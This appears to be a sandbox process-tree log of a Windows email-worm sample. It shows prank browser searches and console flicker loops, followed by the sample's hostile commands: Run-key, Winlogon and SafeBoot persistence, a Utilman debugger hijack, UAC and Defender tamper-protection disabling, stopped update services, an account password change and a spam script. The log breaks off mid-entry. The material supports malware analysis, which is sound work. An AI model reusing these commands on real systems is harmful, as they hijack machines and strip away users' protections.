        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --always-read-main-dll --field-trial-handle=10580,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=10492 /prefetch:1
        5⤵
        
        PID:7116
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --always-read-main-dll --field-trial-handle=10592,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=10096 /prefetch:1
        5⤵
        
        PID:6380
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --always-read-main-dll --field-trial-handle=10484,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=10132 /prefetch:1
        5⤵
        
        PID:6192
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=11036,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=11064 /prefetch:14
        5⤵
        
        PID:7572
- - C:\Windows\system32\timeout.exe
    timeout 5 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:2016
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.co.ck/search?q=youtube+killscreen
    3⤵
    PID:1936
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-skip-compat-layer-relaunch --single-argument http://www.google.co.ck/search?q=youtube+killscreen
      4⤵
      PID:5748
- - C:\Windows\system32\timeout.exe
    timeout 5 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:4736
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.co.ck/search?q=dank+ajae
    3⤵
    PID:1164
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-skip-compat-layer-relaunch --single-argument http://www.google.co.ck/search?q=dank+ajae
      4⤵
      PID:4608
- - C:\Windows\system32\timeout.exe
    timeout 5 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:540
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.co.ck/search?q=mydoom+virus+free+download+no+virus
    3⤵
    PID:4900
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-skip-compat-layer-relaunch --single-argument http://www.google.co.ck/search?q=mydoom+virus+free+download+no+virus
      4⤵
      PID:888
- - C:\Windows\system32\timeout.exe
    timeout 5 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:1672
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.com/search?q=my+computer+is+doing+weird+things+wtf+is+happening+plz+halp
    3⤵
    PID:752
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-skip-compat-layer-relaunch --single-argument http://www.google.com/search?q=my+computer+is+doing+weird+things+wtf+is+happening+plz+halp
      4⤵
      PID:1572
- - C:\Windows\system32\timeout.exe
    timeout 5 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:1340
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.com/search?q=fuck+you
    3⤵
    PID:3784
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-skip-compat-layer-relaunch --single-argument http://www.google.com/search?q=fuck+you
      4⤵
      PID:2728
- - C:\Windows\system32\timeout.exe
    timeout 5 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:2456
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.com/search?q=bfdi+hax+download
    3⤵
    PID:1940
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-skip-compat-layer-relaunch --single-argument http://www.google.com/search?q=bfdi+hax+download
      4⤵
      PID:4872
- - C:\Windows\system32\timeout.exe
    timeout 5 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:4836
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://softendo.com/
    3⤵
    PID:964
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-skip-compat-layer-relaunch --single-argument http://softendo.com/
      4⤵
      PID:2128
- - C:\Windows\system32\timeout.exe
    timeout 5 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:1196
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.com/search?q=new+super+mario+bros+forever+2012+download+no+virus
    3⤵
    PID:5988
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-skip-compat-layer-relaunch --single-argument http://www.google.com/search?q=new+super+mario+bros+forever+2012+download+no+virus
      4⤵
      PID:4048
- - C:\Windows\system32\timeout.exe
    timeout 5 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:4412
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.com/search?q=bored+smashing
    3⤵
    PID:5836
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-skip-compat-layer-relaunch --single-argument http://www.google.com/search?q=bored+smashing
      4⤵
      PID:1348
- - C:\Windows\system32\timeout.exe
    timeout 5 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:2376
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.com/search?q=batch+virus+download
    3⤵
    PID:4304
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-skip-compat-layer-relaunch --single-argument http://www.google.com/search?q=batch+virus+download
      4⤵
      PID:2928
- - C:\Windows\system32\timeout.exe
    timeout 5 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:5340
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://youareanidiot.cc/
    3⤵
    PID:4924
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-skip-compat-layer-relaunch --single-argument http://youareanidiot.cc/
      4⤵
      PID:6012
- - C:\Windows\system32\timeout.exe
    timeout 5 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:5968
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.com/search?q=i+crave+beans
    3⤵
    PID:3876
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-skip-compat-layer-relaunch --single-argument http://www.google.com/search?q=i+crave+beans
      4⤵
      PID:1796
- - C:\Windows\system32\timeout.exe
    timeout 5 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:3392
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.nl/search?q=smoll+pp
    3⤵
    PID:3368
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-skip-compat-layer-relaunch --single-argument http://www.google.nl/search?q=smoll+pp
      4⤵
      PID:3876
- - C:\Windows\system32\timeout.exe
    timeout 5 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:5968
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.ca/search?q=strawberry+benis
    3⤵
    PID:5372
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-skip-compat-layer-relaunch --single-argument http://www.google.ca/search?q=strawberry+benis
      4⤵
      PID:5392
- - C:\Windows\system32\timeout.exe
    timeout 5 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:2812
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.ca/search?q=cats+with+no+braincells
    3⤵
    PID:5372
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-skip-compat-layer-relaunch --single-argument http://www.google.ca/search?q=cats+with+no+braincells
      4⤵
      PID:2428
- - C:\Windows\system32\timeout.exe
    timeout 5 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:540
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.ca/search?q=cats+kissing+gif
    3⤵
    PID:5968
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-skip-compat-layer-relaunch --single-argument http://www.google.ca/search?q=cats+kissing+gif
      4⤵
      PID:5680
- - C:\Windows\system32\timeout.exe
    timeout 5 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:5408
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.ca/search?q=theshellshield
    3⤵
    PID:904
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-skip-compat-layer-relaunch --single-argument http://www.google.ca/search?q=theshellshield
      4⤵
      PID:5092
- - C:\Windows\system32\timeout.exe
    timeout 5 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:412
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.ca/search?q=stinky+bitch
    3⤵
    PID:1464
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-skip-compat-layer-relaunch --single-argument http://www.google.ca/search?q=stinky+bitch
      4⤵
      PID:4748
- - C:\Windows\system32\timeout.exe
    timeout 5 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:196
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.ca/search?q=guys+im+drunk
    3⤵
    PID:6308
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-skip-compat-layer-relaunch --single-argument http://www.google.ca/search?q=guys+im+drunk
      4⤵
      PID:6336
- - C:\Windows\system32\timeout.exe
    timeout 5 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:6316
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.ca/search?q=coiny+dont+stop
    3⤵
    PID:6616
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-skip-compat-layer-relaunch --single-argument http://www.google.ca/search?q=coiny+dont+stop
      4⤵
      PID:6644
- - C:\Windows\system32\timeout.exe
    timeout 5 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:6624
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.ca/search?q=h3lp+m3
    3⤵
    PID:6952
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-skip-compat-layer-relaunch --single-argument http://www.google.ca/search?q=h3lp+m3
      4⤵
      PID:6980
- - C:\Windows\system32\timeout.exe
    timeout 5 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:6960
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.ca/search?q=nitro+generator+WITH+virus
    3⤵
    PID:3760
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-skip-compat-layer-relaunch --single-argument http://www.google.ca/search?q=nitro+generator+WITH+virus
      4⤵
      PID:4700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K cds.bat
    3⤵
    PID:3244
  - - C:\Windows\system32\mode.com
      mode 80
      4⤵
      PID:6212
  - - C:\Windows\system32\mode.com
      mode 70
      4⤵
      PID:6616
  - - C:\Windows\system32\mode.com
      mode 50
      4⤵
      PID:6732
  - - C:\Windows\system32\mode.com
      mode 40
      4⤵
      PID:6528
  - - C:\Windows\system32\mode.com
      mode 30
      4⤵
      PID:6912
  - - C:\Windows\system32\mode.com
      mode 80
      4⤵
      PID:6624
  - - C:\Windows\system32\mode.com
      mode 70
      4⤵
      PID:6984
  - - C:\Windows\system32\mode.com
      mode 50
      4⤵
      PID:6252
  - - C:\Windows\system32\mode.com
      mode 40
      4⤵
      PID:6180
  - - C:\Windows\system32\mode.com
      mode 30
      4⤵
      PID:6704
  - - C:\Windows\system32\mode.com
      mode 80
      4⤵
      PID:6752
  - - C:\Windows\system32\mode.com
      mode 70
      4⤵
      PID:6680
  - - C:\Windows\system32\mode.com
      mode 50
      4⤵
      PID:2628
  - - C:\Windows\system32\mode.com
      mode 40
      4⤵
      PID:3120
  - - C:\Windows\system32\mode.com
      mode 30
      4⤵
      PID:4900
  - - C:\Windows\system32\mode.com
      mode 80
      4⤵
      PID:6748
  - - C:\Windows\system32\mode.com
      mode 70
      4⤵
      PID:6564
  - - C:\Windows\system32\mode.com
      mode 50
      4⤵
      PID:7040
  - - C:\Windows\system32\mode.com
      mode 40
      4⤵
      PID:3760
  - - C:\Windows\system32\mode.com
      mode 30
      4⤵
      PID:6204
  - - C:\Windows\system32\mode.com
      mode 80
      4⤵
      PID:5768
  - - C:\Windows\system32\mode.com
      mode 70
      4⤵
      PID:6656
  - - C:\Windows\system32\mode.com
      mode 50
      4⤵
      PID:6392
  - - C:\Windows\system32\mode.com
      mode 40
      4⤵
      PID:6536
  - - C:\Windows\system32\mode.com
      mode 30
      4⤵
      PID:6708
  - - C:\Windows\system32\mode.com
      mode 80
      4⤵
      PID:6464
  - - C:\Windows\system32\mode.com
      mode 70
      4⤵
      PID:7224
  - - C:\Windows\system32\mode.com
      mode 50
      4⤵
      PID:7268
  - - C:\Windows\system32\mode.com
      mode 40
      4⤵
      PID:7308
  - - C:\Windows\system32\mode.com
      mode 30
      4⤵
      PID:7348
  - - C:\Windows\system32\mode.com
      mode 80
      4⤵
      PID:7404
  - - C:\Windows\system32\mode.com
      mode 70
      4⤵
      PID:7444
  - - C:\Windows\system32\mode.com
      mode 50
      4⤵
      PID:7492
  - - C:\Windows\system32\mode.com
      mode 40
      4⤵
      PID:7536
  - - C:\Windows\system32\mode.com
      mode 30
      4⤵
      PID:7588
  - - C:\Windows\system32\mode.com
      mode 80
      4⤵
      PID:7640
  - - C:\Windows\system32\mode.com
      mode 70
      4⤵
      PID:7688
  - - C:\Windows\system32\mode.com
      mode 50
      4⤵
      PID:7740
  - - C:\Windows\system32\mode.com
      mode 40
      4⤵
      PID:7764
  - - C:\Windows\system32\mode.com
      mode 30
      4⤵
      PID:7796
  - - C:\Windows\system32\mode.com
      mode 80
      4⤵
      PID:7828
  - - C:\Windows\system32\mode.com
      mode 70
      4⤵
      PID:7888
  - - C:\Windows\system32\mode.com
      mode 50
      4⤵
      PID:7936
  - - C:\Windows\system32\mode.com
      mode 40
      4⤵
      PID:7972
  - - C:\Windows\system32\mode.com
      mode 30
      4⤵
      PID:8004
  - - C:\Windows\system32\mode.com
      mode 80
      4⤵
      PID:8044
  - - C:\Windows\system32\mode.com
      mode 70
      4⤵
      PID:8076
  - - C:\Windows\system32\mode.com
      mode 50
      4⤵
      PID:8124
  - - C:\Windows\system32\mode.com
      mode 40
      4⤵
      PID:8156
  - - C:\Windows\system32\mode.com
      mode 30
      4⤵
      PID:7028
  - - C:\Windows\system32\mode.com
      mode 80
      4⤵
      PID:7220
  - - C:\Windows\system32\mode.com
      mode 70
      4⤵
      PID:7276
  - - C:\Windows\system32\mode.com
      mode 50
      4⤵
      PID:7312
  - - C:\Windows\system32\mode.com
      mode 40
      4⤵
      PID:7392
  - - C:\Windows\system32\mode.com
      mode 30
      4⤵
      PID:7428
  - - C:\Windows\system32\mode.com
      mode 80
      4⤵
      PID:7432
  - - C:\Windows\system32\mode.com
      mode 70
      4⤵
      PID:7468
  - - C:\Windows\system32\mode.com
      mode 50
      4⤵
      PID:7460
  - - C:\Windows\system32\mode.com
      mode 40
      4⤵
      PID:7488
  - - C:\Windows\system32\mode.com
      mode 30
      4⤵
      PID:7504
  - - C:\Windows\system32\mode.com
      mode 80
      4⤵
      PID:7532
  - - C:\Windows\system32\mode.com
      mode 70
      4⤵
      PID:7604
  - - C:\Windows\system32\mode.com
      mode 50
      4⤵
      PID:7744
  - - C:\Windows\system32\mode.com
      mode 40
      4⤵
      PID:7772
  - - C:\Windows\system32\mode.com
      mode 30
      4⤵
      PID:7808
  - - C:\Windows\system32\mode.com
      mode 80
      4⤵
      PID:7824
  - - C:\Windows\system32\mode.com
      mode 70
      4⤵
      PID:8032
  - - C:\Windows\system32\mode.com
      mode 50
      4⤵
      PID:8036
  - - C:\Windows\system32\mode.com
      mode 40
      4⤵
      PID:8064
  - - C:\Windows\system32\mode.com
      mode 30
      4⤵
      PID:8068
  - - C:\Windows\system32\mode.com
      mode 80
      4⤵
      PID:8056
  - - C:\Windows\system32\mode.com
      mode 70
      4⤵
      PID:8048
  - - C:\Windows\system32\mode.com
      mode 50
      4⤵
      PID:8104
- - C:\Windows\system32\reg.exe
    REG ADD "HKCU\Software\Microsoft\ColorFiltering" /v "Active" /t REG_DWORD /d 1 /f
    3⤵
    PID:1420
- - C:\Windows\system32\reg.exe
    REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility" /v "Configuration" /t REG_SZ /d "colorfiltering" /f
    3⤵
    PID:5328
- - C:\Windows\system32\sc.exe
    sc.exe create "Swift Hack Protection" binpath= "C:\Windows\System32\sex.exe"
    3⤵
    - Launches sc.exe
    PID:6180
- - C:\Windows\system32\sc.exe
    sc.exe create "Hack Protection Swift" binpath= "C:\Windows\System32\mbr.exe"
    3⤵
    - Launches sc.exe
    PID:6516
- - C:\Windows\system32\sc.exe
    sc config "Hack Protection Swift" start= auto
    3⤵
    - Launches sc.exe
    PID:6224
- - C:\Windows\system32\sc.exe
    sc config "Swift Hack Protection" start= auto
    3⤵
    - Launches sc.exe
    PID:2408
- - C:\Windows\system32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:6664
- - C:\Windows\system32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:6704
- - C:\Windows\system32\sc.exe
    sc config "wuauserv" start= disabled
    3⤵
    - Launches sc.exe
    PID:6648
- - C:\Windows\system32\sc.exe
    sc config "bits" start= disabled
    3⤵
    - Launches sc.exe
    PID:6656
- - C:\Windows\system32\cscript.exe
    cscript email_spam.vbs
    3⤵
    PID:6916
- - C:\Windows\system32\reg.exe
    REG ADD "HKCU\Software\Microsoft\ColorFiltering" /v "FilterType" /t REG_DWORD /d 1 /f
    3⤵
    PID:6952
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /f /d "explorer.exe, C:\Windows\System32\sex.exe"
    3⤵
    - Modifies WinLogon for persistence
    PID:7004
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v "sex.exe" /d "C:\Windows\System32\sex.exe"
    3⤵
    - Adds Run key to start application
    PID:7032
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "sex.exe" /d "C:\Windows\System32\sex.exe"
    3⤵
    - Adds Run key to start application
    - Modifies registry key
    PID:5940
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v "mbr.exe" /d "C:\Windows\N3OS3X3R\mbr.exe"
    3⤵
    - Adds Run key to start application
    PID:6876
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v "player.vbs" /d "player.vbs"
    3⤵
    - Adds Run key to start application
    PID:2372
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    - Modifies registry key
    PID:2388
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    - Modifies registry key
    PID:2992
- - C:\Windows\system32\reg.exe
    reg add HKLM\System\CurrentControlSet\Control\SafeBoot /v AlternateShell /t REG_SZ /d "C:\Windows\System32\sex.exe" /f
    3⤵
    - Modifies registry key
    PID:6716
- - C:\Windows\system32\reg.exe
    reg add HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName /v "ComputerName" /t REG_SZ /d "Neo" /f
    3⤵
    - Modifies registry key
    PID:6748
- - C:\Windows\system32\reg.exe
    reg add "HKCU\Control Panel\International" /v "s1159" /t REG_SZ /d "Neo" /f
    3⤵
    PID:6468
- - C:\Windows\system32\reg.exe
    reg add "HKCU\Control Panel\International" /v "s2359" /t REG_SZ /d "Neo" /f
    3⤵
    PID:6540
- - C:\Windows\system32\reg.exe
    reg add "HKCU\Control Panel\International" /v "sCountry" /t REG_SZ /d "Country of Sex" /f
    3⤵
    PID:6912
- - C:\Windows\system32\reg.exe
    reg add "HKCU\Control Panel\International" /v "sCurrency" /t REG_SZ /d "Neo" /f
    3⤵
    PID:7036
- - C:\Windows\system32\reg.exe
    reg add "HKCU\Control Panel\International" /v "sNativeDigits" /t REG_SZ /d "Neo" /f
    3⤵
    PID:5940
- - C:\Windows\system32\reg.exe
    reg add "HKCU\Console" /v "CursorSize" /t REG_DWORD /d "199" /f
    3⤵
    PID:6476
- - C:\Windows\system32\reg.exe
    REG ADD "HKCU\Software\Microsoft\ColorFiltering" /v "FilterType" /t REG_DWORD /d 0 /f
    3⤵
    PID:6520
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Policies\CredentialUI" /v "DisablePasswordReveal" /t REG_DWORD /f /d 1
    3⤵
    PID:5768
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ /v BatteryFlyout /t REG_DWORD /f /d 0
    3⤵
    PID:6704
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation\ /v HelpCustomized /t REG_DWORD /f /d 1
    3⤵
    PID:3620
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation\ /v Manufacturer /t REG_SZ /f /d "Neo"
    3⤵
    PID:6836
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation\ /v Model /t REG_SZ /f /d "Neo"
    3⤵
    PID:6544
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation\ /v SupportHours /t REG_SZ /f /d "Neo"
    3⤵
    PID:6560
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation\ /v SupportPhone /t REG_SZ /f /d "Neo"
    3⤵
    PID:6920
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation\ /v SupportURL /t REG_SZ /f /d "http://www.neocorporations.com"
    3⤵
    PID:6624
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\MTCUVC" /v EnableMtcUvc /t REG_DWORD /f /d 0
    3⤵
    PID:7000
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v shutdownwithoutlogon /t REG_DWORD /f /d 0
    3⤵
    PID:2252
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DontDisplayNetworkSelectionUI /t REG_DWORD /f /d 1
    3⤵
    PID:4700
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe" /v "Debugger" /t REG_SZ /d "C:\Windows\System32\sex.exe" /f
    3⤵
    PID:1296
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Email-Worm.Win32.AjaeV4\bozo.vbs"
    3⤵
    PID:4900
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Email-Worm.Win32.AjaeV4\bozo2.vbs"
    3⤵
    PID:6840
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Email-Worm.Win32.AjaeV4\bozo3.vbs"
    3⤵
    PID:6928
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Email-Worm.Win32.AjaeV4\bozo4.vbs"
    3⤵
    PID:6888
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Email-Worm.Win32.AjaeV4\bozo5.vbs"
    3⤵
    PID:5380
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Email-Worm.Win32.AjaeV4\bozo6.vbs"
    3⤵
    PID:6212
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Email-Worm.Win32.AjaeV4\bozo7.vbs"
    3⤵
    PID:6756
- - C:\Windows\system32\net.exe
    net user Admin ih82011jaxs
    3⤵
    PID:6548
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user Admin ih82011jaxs
      4⤵
      PID:6652
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
    3⤵
    PID:6392
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\SgrmBroker" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
